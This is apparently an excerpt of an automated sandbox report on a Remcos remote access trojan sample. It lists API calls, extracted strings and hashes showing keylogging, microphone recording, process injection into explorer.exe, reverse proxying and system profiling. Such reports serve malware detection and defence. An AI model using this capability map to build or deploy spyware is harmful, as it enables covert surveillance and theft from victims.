                                                                                                • Opcode ID: 6e582879fdb95b5eb241110b1c4896f2dbd4dfc0d6566bb9b95a81e2e81fb98c
                                                                                                • Instruction ID: a35366ba27863770f41d020e2d809a06ff37228c29ccb260fdbf0525f8878b4a
                                                                                                • Opcode Fuzzy Hash: 6e582879fdb95b5eb241110b1c4896f2dbd4dfc0d6566bb9b95a81e2e81fb98c
                                                                                                • Instruction Fuzzy Hash: FD11B676500108BFDB01EF96C852CD93BA9FF05354B6241AAFE488F226DB35DE509B8D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                • API String ID: 3578746661-3604713145
                                                                                                • Opcode ID: 521bfc0f23ccb7f0c574cf55f4fedddf81fc9d69e4144a6dc2418c24e37844c8
                                                                                                • Instruction ID: eff6fc71ce925c47b380800239c389c467092b4a5c3464dac972748da0f26b71
                                                                                                • Opcode Fuzzy Hash: 521bfc0f23ccb7f0c574cf55f4fedddf81fc9d69e4144a6dc2418c24e37844c8
                                                                                                • Instruction Fuzzy Hash: 3451B531A042015BC614FB36C91AAAE36A5AB84344F40453FF906A76F1EFBD8D85C7CE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456F3F), ref: 00455E68
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: 6fe1295bdd25f4f1a78ee600a9a1b2496a6a8165ae1eb54d48c2b7636e0dbce5
                                                                                                • Instruction ID: 0f57c59634fb7a4e7797d35698a15f7e89d6327b6ac9b7ea032057c8322c8714
                                                                                                • Opcode Fuzzy Hash: 6fe1295bdd25f4f1a78ee600a9a1b2496a6a8165ae1eb54d48c2b7636e0dbce5
                                                                                                • Instruction Fuzzy Hash: 2B517D7190090ACBCF10DF58E9581BEBBB0FB49306F614197D841A7396CB798E298B1E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417443
                                                                                                  • Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC
                                                                                                • Sleep.KERNEL32(00000064), ref: 0041746F
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004174A3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                • API String ID: 1462127192-2001430897
                                                                                                • Opcode ID: 4b40f5b2e34b38d6b4d2e34401560a98a04eebcb988fdd9fb552673f62673dcd
                                                                                                • Instruction ID: 08e178d58cb94228c3422c156c5c16405d07e5ed2aae09261949ad67490c1d9a
                                                                                                • Opcode Fuzzy Hash: 4b40f5b2e34b38d6b4d2e34401560a98a04eebcb988fdd9fb552673f62673dcd
                                                                                                • Instruction Fuzzy Hash: D5313F7194011A9ADB04FBA1DC96DED7775AF10309F40017EF506720E2EF785A8ACA9C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\yaALNupJCH.exe), ref: 0040749E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess
                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                • API String ID: 2050909247-4242073005
                                                                                                • Opcode ID: 1d7fef670ac32d1458b7b125a0323f10745753faa8a49cf3701c3c420fcf5eae
                                                                                                • Instruction ID: bc6dbff0aa7a72516d7c70bfac6cc66ded9047052da24c13ef57668a4d7cd7d0
                                                                                                • Opcode Fuzzy Hash: 1d7fef670ac32d1458b7b125a0323f10745753faa8a49cf3701c3c420fcf5eae
                                                                                                • Instruction Fuzzy Hash: 1C31A571A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8F8448B6F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401D50
                                                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                • API String ID: 3809562944-243156785
                                                                                                • Opcode ID: 5440b7f27a0b7c684a07a1fe7e947bc3438ad6ee44469cc2b6da6e6cae1fdd43
                                                                                                • Instruction ID: 86e44ae8bedd0ebf4347f5aedf48d4a89b3e0c101edbf811c5c3d30ebe35e1e4
                                                                                                • Opcode Fuzzy Hash: 5440b7f27a0b7c684a07a1fe7e947bc3438ad6ee44469cc2b6da6e6cae1fdd43
                                                                                                • Instruction Fuzzy Hash: 793161315043019FC325EB61DD56A9A77A8EB94314F40443EF18DA21F2EFB89A49CB5E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                • waveInStart.WINMM ref: 00401CFE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: dMG$|MG$PG
                                                                                                • API String ID: 1356121797-532278878
                                                                                                • Opcode ID: c221aea4fce1c3107db83a77f38fb06dabf39ae871bf7de157c09f86457ff83c
                                                                                                • Instruction ID: 20befe2c3b3cf13b08393a25abd1b36ed57efd15c64c44280ed0b29356de7c79
                                                                                                • Opcode Fuzzy Hash: c221aea4fce1c3107db83a77f38fb06dabf39ae871bf7de157c09f86457ff83c
                                                                                                • Instruction Fuzzy Hash: 15213971604201AFC7399F66EE05A6A7BB6EB84715B00803EA10DD76B1DBB84881CB1C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D3C4
                                                                                                  • Part of subcall function 0041D45D: RegisterClassExA.USER32(00000030), ref: 0041D4A9
                                                                                                  • Part of subcall function 0041D45D: CreateWindowExA.USER32 ref: 0041D4C4
                                                                                                  • Part of subcall function 0041D45D: GetLastError.KERNEL32 ref: 0041D4CE
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D3FB
                                                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D415
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D42B
                                                                                                • TranslateMessage.USER32(?), ref: 0041D437
                                                                                                • DispatchMessageA.USER32 ref: 0041D441
                                                                                                • GetMessageA.USER32 ref: 0041D44E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                • Instruction ID: e282ba57f5f7090582ef61bd5218c64c1a6e96440b5edf8ca63e0eac7fc3bbf0
                                                                                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                • Instruction Fuzzy Hash: 7B015271800345EBD7109FA5EC4CFEABB7CEB85705F00402AF515931A1D778E885CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ff817641d775207c8839d634c11e4697690ebb15b5d21cf5091a0013dcfa5c30
                                                                                                • Instruction ID: 68c5a07d159de0082b44928ad34cdc6002ce69b499563f06be8c90fc61f22854
                                                                                                • Opcode Fuzzy Hash: ff817641d775207c8839d634c11e4697690ebb15b5d21cf5091a0013dcfa5c30
                                                                                                • Instruction Fuzzy Hash: 64C1F771E04285EFDB15DF99C881BAD7BB0BF49310F04419AE6519B393C774AB42CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: deedb161f42dead65039297b344bbc88d7a973a326667ab2a5eb92d126fd70dc
                                                                                                • Instruction ID: bc9101534197174687616f3321db5155530f9d2df3e04a4d6add1b90fa5dd2ef
                                                                                                • Opcode Fuzzy Hash: deedb161f42dead65039297b344bbc88d7a973a326667ab2a5eb92d126fd70dc
                                                                                                • Instruction Fuzzy Hash: 52C14970D05249AFEF51DFA9C881BAEBBB1EF09300F18415AE914A7392C73C8D45CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453D70
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453DF3
                                                                                                • __alloca_probe_16.LIBCMT ref: 00453E2B
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00453F9D,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453E86
                                                                                                • __alloca_probe_16.LIBCMT ref: 00453ED5
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453E9D
                                                                                                  • Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F19
                                                                                                • __freea.LIBCMT ref: 00453F44
                                                                                                • __freea.LIBCMT ref: 00453F50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID:
                                                                                                • API String ID: 201697637-0
                                                                                                • Opcode ID: 88c37d39953354d41b678b337c6746aface65072aedf168112e6b1f7eaf8fd59
                                                                                                • Instruction ID: c41b4ac32cf2e64be7c3f772a3bd9f8c5d61163beb175bcb63f9ab3c35cfe47a
                                                                                                • Opcode Fuzzy Hash: 88c37d39953354d41b678b337c6746aface65072aedf168112e6b1f7eaf8fd59
                                                                                                • Instruction Fuzzy Hash: 5E91E372E00216AADF218E65C841AEFBBB59F09787F14415BEC05E7282D73DDE48C768
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                • _memcmp.LIBVCRUNTIME ref: 00445363
                                                                                                • _free.LIBCMT ref: 004453D4
                                                                                                • _free.LIBCMT ref: 004453ED
                                                                                                • _free.LIBCMT ref: 0044541F
                                                                                                • _free.LIBCMT ref: 00445428
                                                                                                • _free.LIBCMT ref: 00445434
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 3d650270663409eeb647b975663f0b35679f9515e52849003da4b768d4d896b6
                                                                                                • Instruction ID: b193eef1824d512bc11d0bb5b1df730bd52d5cef41945038379268ca97d1a664
                                                                                                • Opcode Fuzzy Hash: 3d650270663409eeb647b975663f0b35679f9515e52849003da4b768d4d896b6
                                                                                                • Instruction Fuzzy Hash: 47B12975A016199FEB24DF18C885BAEB7B4FB08304F1085EEE949A7351D774AE90CF48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: ec04a778613b02d88d88d5331b5d3629692560195fe72b535b1e99ed76cf7fff
                                                                                                • Instruction ID: 9d76a0c9ad3deaf1f7ecf65dac24a6283800f1d85165e355cec6a2089a408fa6
                                                                                                • Opcode Fuzzy Hash: ec04a778613b02d88d88d5331b5d3629692560195fe72b535b1e99ed76cf7fff
                                                                                                • Instruction Fuzzy Hash: B47197B0A483428FDB24DE2884806ABB7E0AFD4785F15443FF88587351D778CD858B9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CC3367
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC336F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CC33F8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC3423
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CC3478
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 1170836740-3733052814
                                                                                                • Opcode ID: 1fd246114f30888354627c6ed3c7f3d1b7607eb676ac5b8d443c826b3e6c89d9
                                                                                                • Instruction ID: ce5406160797f03ee20ce6f82a2f5e531afcae38da948a174b94df401bd5c7ef
                                                                                                • Opcode Fuzzy Hash: 1fd246114f30888354627c6ed3c7f3d1b7607eb676ac5b8d443c826b3e6c89d9
                                                                                                • Instruction Fuzzy Hash: F151A134A002849FCF15DF29E845FAEBBA5AF44314F14C19DE8159B3A2C772DB02CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                                  • Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: @kG$XMG$NG$NG
                                                                                                • API String ID: 1649129571-2828059001
                                                                                                • Opcode ID: d11aa6827783ca1f78788ad7a1875fc96f00494b4586a86b26c6c6b9e6b90d2c
                                                                                                • Instruction ID: 65e0bbd845b0698e41ba7c367e27804c35fd250e2cfc12280843aa406abfdd31
                                                                                                • Opcode Fuzzy Hash: d11aa6827783ca1f78788ad7a1875fc96f00494b4586a86b26c6c6b9e6b90d2c
                                                                                                • Instruction Fuzzy Hash: 7E41D5312042009BC324FB26DD96ABE73A6ABD5314F00453FF55AA61F2DF386E49C65E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                • String ID: .part
                                                                                                • API String ID: 1303771098-3499674018
                                                                                                • Opcode ID: 6d98fc7951b37758a9c32ffa506aac1bbd0b3830703c2cbc954d984816369e8e
                                                                                                • Instruction ID: e874ae31f88d0aa3f072cf1e943b28158a3678564fa17fbb0695c37f8af014c9
                                                                                                • Opcode Fuzzy Hash: 6d98fc7951b37758a9c32ffa506aac1bbd0b3830703c2cbc954d984816369e8e
                                                                                                • Instruction Fuzzy Hash: 80318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                                                • SetWindowsHookExA.USER32 ref: 0040A2E1
                                                                                                • GetLastError.KERNEL32 ref: 0040A2ED
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                • GetMessageA.USER32 ref: 0040A33B
                                                                                                • TranslateMessage.USER32(?), ref: 0040A34A
                                                                                                • DispatchMessageA.USER32 ref: 0040A355
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 0040A301
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                • Opcode ID: 3df408a81acfbebc480de00894adf9834a2d8d6a6c4bdcba1a831ec92b492a0d
                                                                                                • Instruction ID: c0c8f532641fd7815ca2cfbe9b0d0a2c8afefb59d963ff424aa3b2ebad638a5d
                                                                                                • Opcode Fuzzy Hash: 3df408a81acfbebc480de00894adf9834a2d8d6a6c4bdcba1a831ec92b492a0d
                                                                                                • Instruction Fuzzy Hash: F1118F32514301ABCB107B769C0986B76ECEA95716B10457EFC85D21D1EA78C910CBAA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DC4F,?,?,?,0044AD5A,00000001,00000001,?), ref: 0044AB63
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AB9B
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DC4F,?,?,?,0044AD5A,00000001,00000001,?), ref: 0044ABE9
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AC80
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044ACE3
                                                                                                • __freea.LIBCMT ref: 0044ACF0
                                                                                                  • Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9
                                                                                                • __freea.LIBCMT ref: 0044ACF9
                                                                                                • __freea.LIBCMT ref: 0044AD1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: cb162bc582dd0838a499862c59a6069a460d6333bb2ae7e35171617e21240b7e
                                                                                                • Instruction ID: af0dc4fbe63ecb207d56a2a0cf6a6b4459746298ae4a4ccc7a56e973e124d7e9
                                                                                                • Opcode Fuzzy Hash: cb162bc582dd0838a499862c59a6069a460d6333bb2ae7e35171617e21240b7e
                                                                                                • Instruction Fuzzy Hash: 69512B72640206AFFB254F64CC81EBF77AAEB44750F15422EFD05D6280EB38DC50C699
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$___from_strstr_to_strchr
                                                                                                • String ID:
                                                                                                • API String ID: 3409252457-0
                                                                                                • Opcode ID: defca25013d2774486d33791db9c9e849cb2380b51e469b3df3a2ff11078fca2
                                                                                                • Instruction ID: eda9318d4e0493f0af14033eb7310e0f0bdfa2bed600b80f902073e0927fec86
